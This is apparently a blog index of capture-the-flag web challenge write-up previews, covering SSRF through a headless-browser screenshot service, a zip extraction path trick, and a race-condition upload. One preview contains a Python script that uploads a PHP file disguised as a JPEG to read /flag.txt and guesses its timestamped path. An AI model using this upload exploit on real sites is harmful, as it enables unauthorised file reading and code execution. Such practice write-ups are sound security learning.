64bps

type: #WEB #whitebox difficulty: #easy SOLVED by: #writeup The challenge statement contains a Unix command, which means the following. Create 2gb.txt and write 2 GiB (2147483648 bytes) of random data dd if=/dev/random of=2gb.txt bs=1M count=2048 Append the contents of flag.txt to the end of 2gb.txt cat flag.txt >> 2gb.txt Delete flag.txt rm flag.txt So we can see that the first 2 GiB of 2gb.txt is random data and the flag is at the end....

May 13, 2023

Screenshot

type: #WEB #whitebox difficulty: #hard SOLVED by: #writeup First, review the application overview. The application returns a screenshot of any page as a PNG image. The URL is specified by a GET parameter like /api/screenshot?url=https%3A%2F%2Fwww.google.com%2F. The backend is implemented in JavaScript (Node.js) and opens the page with Headless Chromium to render the content. The flag is stored in /flag.txt. In applications where the server accesses the URL specified by the user, an attack technique called SSRF (Server Side Request Forgery) is known....

May 13, 2023

web writeups

colorful board first blood anotherslove mongodb objectid buntime ezstart import requests from datetime import datetime from concurrent.futures import ThreadPoolExecutor import warnings import re warnings.simplefilter('ignore') URL = "https://cc435f7badc1e1fda35d576b.deadsec.quest/" # URL = "http://localhost:1338/" COUNT = 5 def upload(): files = {'files': ('foobar.php', b"<?php readfile('/flag.txt') ?>", 'image/jpeg')} return requests.post(URL + "upload.php", files=files, verify=False) def read(timestamp): return requests.get(URL + f"tmp/foobar_{timestamp}.php", verify=False) diff = 0 while True: timestamp = int(datetime.now().timestamp()) - diff with ThreadPoolExecutor(max_workers=5) as executor: r1 = executor....

May 13, 2023

Extract Service 1

type: #WEB #whitebox difficulty: #easy SOLVED by: #myself lesson learnt > after almost 2 days from trying and not understading shit being copypasta person if you don’t understand the code playing with it isn’t enough the challenge opening the web page i see this uploading a file and the site spit out its content looking and the source code it’s takes a zipped file ‘docx is a zipped file btw’ to unzip it and read a traget AT LINE 38 we see that we control the key-value ExtractTarget in our POST request rn its word/document let’s do poc we will replace word/document....

May 7, 2023

IndexedDB

type: #WEB difficulty: #beginner SOLVED by: #myself the challenge IndexedDB is a database that is built into a browser, much more powerful than localStorage. Stores almost any kind of values by keys, multiple key types. Supports transactions for reliability. Supports key range queries, indexes. Can store much bigger volumes of data than localStorage. ***you can view it by using dev tools in your browser

May 7, 2023

INTRODUCTION

OFFICIAL WRITEUP [[Philanthropy]] https://github.com/AustinStitz-Hacking/csaw23qual